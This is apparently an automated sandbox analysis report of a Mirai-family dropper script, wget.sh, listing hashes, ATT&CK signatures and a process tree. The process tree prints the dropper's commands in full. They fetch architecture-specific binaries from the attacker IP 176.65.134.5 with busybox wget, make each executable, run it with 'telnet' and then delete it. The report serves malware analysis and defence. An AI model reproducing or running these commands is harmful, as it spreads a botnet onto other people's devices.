Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
132s -
max time network
148s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240611-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
10/03/2025, 22:22
Static task
static1
Behavioral task
behavioral1
Sample
wget.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
wget.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
wget.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
wget.sh
Resource
debian9-mipsel-20240418-en
General
-
Target
wget.sh
-
Size
1KB
-
MD5
fe3891afe068ca6fc86017361dfb753c
-
SHA1
d631b6a4eaa99085df4260727c2c86dc82cf5428
-
SHA256
8dcc3e92c112fb94931bd86055dc51f74a70007c058d1571a4eaec583a0852c0
-
SHA512
810560af118bf04a2723fb177bbdf25682e3cb8b95611e15c8d83576305ea41ba11dec0d42c410fc5b287cb8a31901f9190946e957ac8deb8c0d634a42334951
Malware Config
Extracted
mirai
BOTNET
Extracted
mirai
BOTNET
Extracted
mirai
BOTNET
Signatures
-
Mirai family
-
File and Directory Permissions Modification 1 TTPs 10 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1524 busybox 1539 busybox 1549 busybox 1566 busybox 1519 busybox 1529 busybox 1534 busybox 1544 busybox 1554 busybox 1559 busybox -
Executes dropped EXE 9 IoCs
ioc pid Process /tmp/jklarm 1520 wget.sh /tmp/jklarm5 1525 wget.sh /tmp/jklarm6 1530 wget.sh /tmp/jklarm7 1535 wget.sh /tmp/jklm68k 1540 wget.sh /tmp/jklmips 1545 wget.sh /tmp/jklmpsl 1550 wget.sh /tmp/jklppc 1555 wget.sh /tmp/jklsh4 1560 wget.sh -
System Network Configuration Discovery 1 TTPs 3 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 1543 busybox 1545 jklmips 1547 busybox -
Writes file to tmp directory 9 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/jklm68k busybox File opened for modification /tmp/jklmips busybox File opened for modification /tmp/jklmpsl busybox File opened for modification /tmp/jklarm7 busybox File opened for modification /tmp/jklppc busybox File opened for modification /tmp/jklsh4 busybox File opened for modification /tmp/jklarm busybox File opened for modification /tmp/jklarm5 busybox File opened for modification /tmp/jklarm6 busybox
Processes
-
/tmp/wget.sh/tmp/wget.sh1⤵
- Executes dropped EXE
PID:1505 -
/bin/busybox/bin/busybox wget http://176.65.134.5/jklarm -O jklarm2⤵
- Writes file to tmp directory
PID:1506
-
-
/bin/busybox/bin/busybox chmod +x jklarm2⤵
- File and Directory Permissions Modification
PID:1519
-
-
/tmp/jklarm./jklarm telnet2⤵PID:1520
-
-
/bin/busybox/bin/busybox rm -rf jklarm2⤵PID:1522
-
-
/bin/busybox/bin/busybox wget http://176.65.134.5/jklarm5 -O jklarm52⤵
- Writes file to tmp directory
PID:1523
-
-
/bin/busybox/bin/busybox chmod +x jklarm52⤵
- File and Directory Permissions Modification
PID:1524
-
-
/tmp/jklarm5./jklarm5 telnet2⤵PID:1525
-
-
/bin/busybox/bin/busybox rm -rf jklarm52⤵PID:1527
-
-
/bin/busybox/bin/busybox wget http://176.65.134.5/jklarm6 -O jklarm62⤵
- Writes file to tmp directory
PID:1528
-
-
/bin/busybox/bin/busybox chmod +x jklarm62⤵
- File and Directory Permissions Modification
PID:1529
-
-
/tmp/jklarm6./jklarm6 telnet2⤵PID:1530
-
-
/bin/busybox/bin/busybox rm -rf jklarm62⤵PID:1532
-
-
/bin/busybox/bin/busybox wget http://176.65.134.5/jklarm7 -O jklarm72⤵
- Writes file to tmp directory
PID:1533
-
-
/bin/busybox/bin/busybox chmod +x jklarm72⤵
- File and Directory Permissions Modification
PID:1534
-
-
/tmp/jklarm7./jklarm7 telnet2⤵PID:1535
-
-
/bin/busybox/bin/busybox rm -rf jklarm72⤵PID:1537
-
-
/bin/busybox/bin/busybox wget http://176.65.134.5/jklm68k -O jklm68k2⤵
- Writes file to tmp directory
PID:1538
-
-
/bin/busybox/bin/busybox chmod +x jklm68k2⤵
- File and Directory Permissions Modification
PID:1539
-
-
/tmp/jklm68k./jklm68k telnet2⤵PID:1540
-
-
/bin/busybox/bin/busybox rm -rf jklm68k2⤵PID:1542
-
-
/bin/busybox/bin/busybox wget http://176.65.134.5/jklmips -O jklmips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1543
-
-
/bin/busybox/bin/busybox chmod +x jklmips2⤵
- File and Directory Permissions Modification
PID:1544
-
-
/tmp/jklmips./jklmips telnet2⤵
- System Network Configuration Discovery
PID:1545
-
-
/bin/busybox/bin/busybox rm -rf jklmips2⤵
- System Network Configuration Discovery
PID:1547
-
-
/bin/busybox/bin/busybox wget http://176.65.134.5/jklmpsl -O jklmpsl2⤵
- Writes file to tmp directory
PID:1548
-
-
/bin/busybox/bin/busybox chmod +x jklmpsl2⤵
- File and Directory Permissions Modification
PID:1549
-
-
/tmp/jklmpsl./jklmpsl telnet2⤵PID:1550
-
-
/bin/busybox/bin/busybox rm -rf jklmpsl2⤵PID:1552
-
-
/bin/busybox/bin/busybox wget http://176.65.134.5/jklppc -O jklppc2⤵
- Writes file to tmp directory
PID:1553
-
-
/bin/busybox/bin/busybox chmod +x jklppc2⤵
- File and Directory Permissions Modification
PID:1554
-
-
/tmp/jklppc./jklppc telnet2⤵PID:1555
-
-
/bin/busybox/bin/busybox rm -rf jklppc2⤵PID:1557
-
-
/bin/busybox/bin/busybox wget http://176.65.134.5/jklsh4 -O jklsh42⤵
- Writes file to tmp directory
PID:1558
-
-
/bin/busybox/bin/busybox chmod +x jklsh42⤵
- File and Directory Permissions Modification
PID:1559
-
-
/tmp/jklsh4./jklsh4 telnet2⤵PID:1560
-
-
/bin/busybox/bin/busybox rm -rf jklsh42⤵PID:1562
-
-
/bin/busybox/bin/busybox wget http://176.65.134.5/jklspc -O jklspc2⤵PID:1563
-
-
/bin/busybox/bin/busybox chmod +x jklspc2⤵
- File and Directory Permissions Modification
PID:1566
-
-
/tmp/jklspc./jklspc telnet2⤵PID:1567
-
-
/bin/busybox/bin/busybox rm -rf jklspc2⤵PID:1568
-
-
/bin/busybox/bin/busybox wget http://176.65.134.5/jklx86 -O jklx862⤵PID:1569
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60KB
MD535c215d8e2b2ea03a8a191fb3723195a
SHA1c38bcfc3d7050edeff1b7dbffd85d07348bb01e9
SHA256c4fd68b20997f3c8a60dbadf177b3309d465f0a8bb0ad9b33b4c70ee74dc3a90
SHA512ea5a9fda95965b6eb55c47eefe2b42a9234d13c8d05556e72e916f98a626a0a835fa7f7828d4051b6056d639b06bec0136afa9ac3157736702b94c0ed9effdf8
-
Filesize
60KB
MD5a04040c769cad786555e183ba8ae0ca0
SHA1a89d6b50a8140dddce29595c64949214e65c84f1
SHA2567568e9e64ac1105cdcae20095154214ee943b2edc6c01e6d4b4eb0b7e06255a3
SHA512e152f552b99683b3bf9b9fee2f7d34027a291e02dd2f912620593e714774cfe07e14aa837cdb2f2a300d35b721dfd67e7012955e24352bdad0ffecb4e61ed162
-
Filesize
69KB
MD59e18604aa4c5bedd6e9ea6690b751880
SHA1c1f32fe93aa650f9920fc5bd659d23621ab034a2
SHA25641342a887d2be09cf0165913b43a5916492e677d20429068d4829a090453ccbb
SHA512cdafb3281bcaa5f5c1af71df8d53c2d022de72a559dfea513b41bc08c7d8fe421839cfdc51b3f93f501bb62d02924e3047208e8bce3a8768af2404f3caa767b0
-
Filesize
82KB
MD5a9675614a267473cb83e195d9074a067
SHA1a4d148cf841fc2b84c8bb3dd322e40f601532875
SHA256fe4e8d464b7849a5483782d0c47e53deaf199e284badad12ed98ca79e47a79d9
SHA5128adcc5df013328218823d3310bcc4f27f6e1e9e51de2e7ecd5521873f5ac6cc2315f9136e1599f1da4114e65eaed23449e78f9ce04062243aa8ec793086b1c28
-
Filesize
60KB
MD5f5fa9a5e6c2a71c86b783b6b5586c3e4
SHA11a7888806663b58f4bee84472dab0b63adfab8ea
SHA256d7ed2bfe303a8e565e6b15e25920d017473b2a7678df3781b6b44840065e2c3d
SHA512e13a443311db4a5b4fc3692be4149f534309e24134baf54f508bf56f509aaff7bfab30c1552540030e23270a689cebd7e2ad48e7989687467ada96915d5ae43a
-
Filesize
78KB
MD5ce4bd94ea8cbc021bf79e11f1f734c25
SHA1f562c88119484f3e92be6e95cb0a435836ca6362
SHA256ef931d8ba4966260112b7ed31a1e0b5cd4423becc0397e8eeaee345de903a1ab
SHA512d0a85bbbf02f85e445856cced0f7942652ca8c2d748f17a25129b5fa2982df148d5b2580d4c7512d579e4e666ec62700233802a145bbeb38715e77f847f26d29
-
Filesize
79KB
MD59f79f159a672411a7e5b01f1ed3deb4a
SHA198584c58a231322ed3e64b96727fe6d935f30aa4
SHA2569cf41e60807702cd85a42ffcabb10f2798193200a381b47f3adbebe65f8360aa
SHA5128486d8dbf427ba9e45b81ae462b64239e7aa33e55603ffa12b8cf7efc80e4b0300e6764fb1c89bc261f910178553b68adc6401fb7de1f6eb36a4f76b5b5b5537
-
Filesize
59KB
MD52d898ada13cb85e3fc710949c44ade47
SHA1db36b96c9531eff756b3d2ee92b632bc4903a179
SHA25600188561e6b9bf60b853e3d752f4131b575a77f48dfdb69f39692e20496f8cdd
SHA512e4952241a4ba8a4a83952c28f6396f575ad304ef212bc1897d2790175dfbab0d2c4f1ae2cfca67825ace8eef17c4b4064fde2e31b12ddbe87b6c074f8e9a6b78
-
Filesize
54KB
MD5e422f23c58693205126b154196d024d8
SHA1efa27cd80e15c1ccada5a5c0de53702097df30ea
SHA256b31d22cb1050faa0328fe4f05f03f450bbaccdc4a983d85f058cee4296890280
SHA512f0ccb11e75c86ebdc1bf20e7e6a9b6bf452c0c1797fe7d234a2e3b026c5f5b576a983abede5414f2622d89bfc9ba3d4ae0f553beae246aeee7a508792597b681